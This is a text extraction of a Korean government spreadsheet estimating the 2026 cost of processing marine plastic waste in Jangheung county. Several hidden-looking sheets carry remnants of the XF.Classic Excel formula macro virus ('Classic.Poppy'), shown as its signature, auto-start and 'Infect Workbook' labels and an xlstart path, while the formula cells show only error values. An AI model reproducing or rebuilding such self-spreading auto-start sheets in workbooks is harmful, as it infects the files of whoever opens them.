Workbook
Name a: [1]적용토목!#REF!
Name Document_array: {"Book1","2009년진도군양식어장정화사업폐기물처리용역(최종).XLS","폐기물 간지.XLS"}
Name Document_array: {"Book1","2008년진도군양식어장정화사업폐기물처리용역(최종).XLS"}
Name Document_array: {"Book1"}
Name w: #REF!
Name 건설기계운전기사: [2]정부노임단가!$B$8
Name 건설기계운전조수: [2]정부노임단가!$B$12
Name 건설기계조장: #REF!
Name 검측선단가: #REF!
Name 경유: #REF!
Name 고급감리원노임: #REF!
Name 고급기능사노임: #REF!
Name 고급기술자노임: #REF!
Name 고급선원: [3]정부노임단가!$B$13
Name 고급선원: [3]정부노임단가!$B$13
Name 굴재시설비: [4]산출근거!#REF!
Name 굴재시설비: [4]산출근거!#REF!
Name 굴철거비: [4]산출근거!#REF!
Name 굴철거비: [4]산출근거!#REF!
Name 기술료01: #REF!
Name 기술료02: #REF!
Name 기술료03: #REF!
Name 기술료04: #REF!
Name 기술사노임: #REF!
Name 노무비: #REF!
Name 노무비: #REF!
Name 노무비: [5]경산!#REF!
Name 노지: [5]경산!#REF!
Name ㅁ1: [6]경산!#REF!
Name ㅁ25: [7]적용건축!$A$558
Name ㅁ250: #REF!
Name ㅁ250: #REF!
Name ㅁ250: #REF!
Name ㅁ30: [7]적용건축!$A$554
Name ㅁ60: [8]직노!#REF!
Name 변: [9]물량표!#REF!
Name 변: [9]물량표!#REF!
Name 보통선원: [3]정부노임단가!$B$14
Name 보통선원: [3]정부노임단가!$B$14
Name 보통인부: #REF!
Name 선부: [10]적용기준!$BQ$44
Name 수중촬영장비단가: #REF!
Name 시간당건설기계운전기사: [11]적용기준!$BQ$11
Name 시간당건설기계운전기사: [11]적용기준!$BQ$11
Name 시간당건설기계운전기사: [12]적용기준!$CA$11
Name 시간당건설기계운전조수: [11]적용기준!$BQ$14
Name 시간당건설기계운전조수: [11]적용기준!$BQ$14
Name 시간당건설기계운전조수: [12]적용기준!$CA$14
Name 시간당건설기계조장: [11]적용기준!$BQ$15
Name 시간당건설기계조장: [11]적용기준!$BQ$15
Name 시간당건설기계조장: [12]적용기준!$CA$15
Name 시간당고급선원: [11]적용기준!$BQ$16
Name 시간당고급선원: [11]적용기준!$BQ$16
Name 시간당고급선원: [12]적용기준!$BQ$18
Name 시간당기계운전사: #REF!
Name 시간당보통선원: [11]적용기준!$BQ$17
Name 시간당보통선원: [11]적용기준!$BQ$17
Name 시간당보통선원: [12]적용기준!$BQ$19
Name 시간당보통인부: #REF!
Name 시간당선부: [11]적용기준!$BQ$20

Sheet VXXXX

Sheet 표지
A1: 조사자 | X1: 설계자 | AU1: 팀장 | BR1: 과장 | CS1: 설계년월 | DD1: 2026년 7월
A4: 2026년 해양쓰레기 선상집하장 폐기물 처리 용역
O6: 1. 사 업 개 요
Q7: o 사업위치 : 장흥군 5개 읍면 집하장 및 어항시설 일원
Q9: o 사업량 : 해양폐기물 처리 | AP9: - | AS9: 폐합성수지 | BG9: : | BH9: =공사비!C7 -> 80 | BO9: 톤
O12: 2. 사 업 비
Q13: ="※ 총 사 업 비 : " & "일금" & NUMBERSTRING(공사비!F21,1) & "원정" -> ※ 총 사 업 비 : 일금삼천삼백구십구만육천원정 | BN13: ( | BO13: =공사비!F21 -> 33996000 | BY13: 원)
Q14: ="※ 도급 예정액 : " & "일금" & NUMBERSTRING(공사비!F21,1) & "원정" -> ※ 도급 예정액 : 일금삼천삼백구십구만육천원정 | BN14: ( | BO14: =BO13 -> 33996000 | BY14: 원)

Sheet 공사비
K1: (단위: 원)
A2: =표지!A4 -> 2026년 해양쓰레기 선상집하장 폐기물 처리 용역
A3: 공 종 | C3: 수 량 | D3: 단위 | E3: 계 | G3: 노 무 비 | I3: 재 료 비 | K3: 경 비
E4: 단 가 | F4: 금 액 | G4: 단 가 | H4: 금 액 | I4: 단 가 | J4: 금 액 | K4: 단 가 | L4: 금 액
A5: 2026년 해양쓰레기 선상집하장 폐기물 처리 용역 - 폐기물 처리 설계예산서
A6: 계
A7: 가. 폐기물 선별비 | B7: 폐합성수지 | C7: 80 | D7: 톤 | E7: =일위대가!F5 -> 74669 | F7: =일위대가!M5 -> 5973520 | I7: 0 | J7: 0 | K7: =일위대가!L5 -> 74669 | L7: =일위대가!M5 -> 5973520
A11: 가. 폐기물 처리비 | B11: 폐합성수지 | C11: 80 | D11: 톤 | E11: =일위대가!F7 -> 269000 | F11: =일위대가!M7 -> 21520000 | K11: =일위대가!L7 -> 269000 | L11: =C11*E11 -> 21520000
A15: 나. 폐기물 운반비 | B15: 폐합성수지 | C15: 80 | D15: 톤 | E15: =일위대가!F9 -> 42660 | F15: =일위대가!M9 -> 3412800 | K15: =일위대가!L9 -> 42660 | L15: =C15*E15 -> 3412800
A17: 합 계 | F17: =SUM(F7:F16) -> 30906320
A19: 부가가치세 | F19: =INT(F17*0.1) -> 3090632
A21: 도 급 예 정 금 액 | F21: =(F17+F19)-952 -> 33996000 | G21: (천원단위 미만 절사)

Sheet 일위대가
A1: NO | B1: 공 종 | C1: 규 격 | D1: 수 량 | E1: 단위 | F1: 계 | H1: 노 무 비 | J1: 재 료 비 | L1: 경 비
F2: 단 가 | G2: 금 액 | H2: 단 가 | I2: 금 액 | J2: 단 가 | K2: 금 액 | L2: 단 가 | M2: 금 액
A3: 표 | B3: =표지!A4 -> 2026년 해양쓰레기 선상집하장 폐기물 처리 용역 | F3: =SUM(H3,J3,L3) -> 0 | G3: =SUM(G5:G10) -> 30906320 | M3: =SUM(M5:M10) -> 30906320
A5: 1 | B5: 폐기물 선별비 | C5: 폐합성수지 | D5: 80 | E5: 톤 | F5: 74669 | G5: =산출근거!AF14 -> 5973520 | L5: =F5 -> 74669 | M5: =F5*D5 -> 5973520
A7: 2 | B7: 폐기물 처리비 | C7: 폐합성수지 | D7: 80 | E7: 톤 | F7: 269000 | G7: =산출근거!AF18 -> 21520000 | L7: 269000 | M7: =F7*D7 -> 21520000
A9: 3 | B9: 폐기물 수집운반비 | C9: 폐합성수지 | D9: 80 | E9: 톤 | F9: 42660 | G9: =D9*F9 -> 3412800 | L9: 42660 | M9: =F9*D9 -> 3412800

Sheet 산출근거
A1: 산 출 근 거
A4: 산거 1호표 폐기물 위탁 처리 | AF4: 환경부 폐합성수지 처리단가 | AL4: 2026년 상반기 노임단가 (보통인부)
AF6: 269000 | AL6: 172068
D7: 폐기물 위탁 처리 | M7: 폐합성수지 | V7: =SUM(AF14:AK25) -> 30906320 | Z7: 원/톤
D12: 내 역 | J12: 단가 | P12: 톤수 | T12: 산출근거 | AF12: 합계 | AL12: 비 고
D14: 선별비 | J14: 74669 | P14: 80 | T14: [64,267원/일(굴삭기0.2)x8hr + 344,136원(보통인부 2인)] x 0.087(톤당 선별시간-양호) X 80톤(쓰레기 추정량) 해양폐기물 수거처리단가 산정 보고서 및 2026년(상) 일위대가 기준 | AF14: =J14*P14 -> 5973520 | AL14: 원단위 절사
D18: 처리비 | J18: =일위대가!F7 -> 269000 | P18: 80 | T18: 269,000원(환경부 고시 내 폐합성수지 처리비) x 80톤(쓰레기 추정량) 방치폐기물 처리이행보증 보험 산출을 위한 폐기물 종류별 처리단가 별표 1기준 | AF18: =J18*P18 -> 21520000 | AL18: 원단위 절사
D22: 수집운반비 | J22: =일위대가!F9 -> 42660 | P22: 80 | T22: [(40,900원(고정비)+35.2(변동비) x 50km(군청-집하장 왕복거리)] x 80톤(쓰레기 추정량) 지정폐기물 공공처리시설 반입수수료 기준 | AF22: =J22*P22 -> 3412800 | AL22: 원단위 절사

Sheet VXXXXXXX
A1: 남성항2.xls | C1: FALSE
A2: Book1
A3: C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3 | C4: FALSE
C5: #NAME?
C6: =#N/A -> #N/A
A7: Classic.Poppy by VicodinES | C7: #NAME?
A8: With Lord Natas | C8: #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: FALSE
A11: (C) The Narkotic Network 1998 | C11: FALSE
C12: FALSE
C13: FALSE
A14: **Simple Payload** | C14: #NAME?
A15: FALSE
A16: FALSE
A17: #NAME? | C17: **Set Our Values and Paths**
C18: #NAME?
C19: #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: #NAME?
A21: #NAME? | C21: #NAME?
A22: #NAME? | C22: #NAME?
A23: =#N/A -> #N/A | C23: #NAME?
A24: #NAME?
A25: #NAME?
A26: FALSE | C26: **Infect Workbook**
A27: FALSE | C27: FALSE
A28: FALSE | C28: #NAME?
A29: FALSE | C29: =#N/A -> #N/A
A30: FALSE | C30: #NAME?
A31: FALSE | C31: #NAME?
A32: FALSE | C32: FALSE
A33: FALSE | C33: FALSE
A34: FALSE | C34: FALSE
A35: FALSE | C35: #NAME?
A36: FALSE | C36: #NAME?
A37: FALSE
A38: FALSE
A39: FALSE | C39: #NAME?
A40: FALSE | C40: FALSE
...

Sheet Recovered_Sheet1
A1: 남성항변경1-1.xls | C1: FALSE
A2: Book1
A3: C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3 | C4: FALSE
C5: #NAME?
C6: =#N/A -> #N/A
A7: Classic.Poppy by VicodinES | C7: #NAME?
A8: With Lord Natas | C8: #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: FALSE
A11: (C) The Narkotic Network 1998 | C11: FALSE
C12: FALSE
C13: FALSE
A14: **Simple Payload** | C14: #NAME?
A15: FALSE
A16: FALSE
A17: #NAME? | C17: **Set Our Values and Paths**
C18: #NAME?
C19: #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: #NAME?
A21: #NAME? | C21: #NAME?
A22: #NAME? | C22: #NAME?
A23: =#N/A -> #N/A | C23: #NAME?
A24: #NAME?
A25: #NAME?
A26: FALSE | C26: **Infect Workbook**
A27: FALSE | C27: FALSE
A28: FALSE | C28: #NAME?
A29: FALSE | C29: =#N/A -> #N/A
A30: FALSE | C30: #NAME?
A31: FALSE | C31: #NAME?
A32: FALSE | C32: FALSE
A33: FALSE | C33: FALSE
A34: FALSE | C34: FALSE
A35: FALSE | C35: #NAME?
A36: FALSE | C36: #NAME?
A37: FALSE
A38: FALSE
A39: FALSE | C39: #NAME?
A40: FALSE | C40: FALSE
...

Sheet Recovered_Sheet2
A1: 02남성항설계.xls | C1: FALSE
A2: 02남성항.XLS
A3: C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3 | C4: FALSE
C5: #NAME?
C6: =#N/A -> #N/A
A7: Classic.Poppy by VicodinES | C7: #NAME?
A8: With Lord Natas | C8: #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: FALSE
A11: (C) The Narkotic Network 1998 | C11: FALSE
C12: FALSE
C13: FALSE
A14: **Simple Payload** | C14: #NAME?
A15: FALSE
A16: FALSE
A17: #NAME? | C17: **Set Our Values and Paths**
C18: #NAME?
C19: #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: #NAME?
A21: #NAME? | C21: #NAME?
A22: #NAME? | C22: #NAME?
A23: =#N/A -> #N/A | C23: #NAME?
A24: #NAME?
A25: #NAME?
A26: FALSE | C26: **Infect Workbook**
A27: FALSE | C27: FALSE
A28: FALSE | C28: #NAME?
A29: FALSE | C29: =#N/A -> #N/A
A30: FALSE | C30: #NAME?
A31: FALSE | C31: #NAME?
A32: FALSE | C32: FALSE
A33: FALSE | C33: FALSE
A34: FALSE | C34: FALSE
A35: FALSE | C35: #NAME?
A36: FALSE | C36: #NAME?
A37: FALSE
A38: FALSE
A39: FALSE | C39: #NAME?
A40: FALSE | C40: FALSE
...

Sheet 00000000
A2: Book1
A3: C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: #N/A
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet xxxxxxxx
A1: 2008년진도군양식어장정화사업폐기물처리용역(최종).XLS
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: #N/A
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet3
A1: 2009년진도군양식어장정화사업폐기물처리용역(최종).XLS
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet 물량표
A1: 2026년 장흥군 해양쓰레기 선상집하장 폐기물 처리 용역
A3: 구 분 | E3: 폐기물 종류 | AB3: 물 량 | AQ3: 비 고
A4: 계 | E4: 폐합성수지 | AB4: =AB6 -> 80 | AM4: 톤
A6: 폐기물 위탁 처리 | E6: 폐합성수지 | AB6: 80 | AM6: 톤 | AQ6: 장흥군 5개 읍면 선상집하장 23개소

Sheet 증빙자료
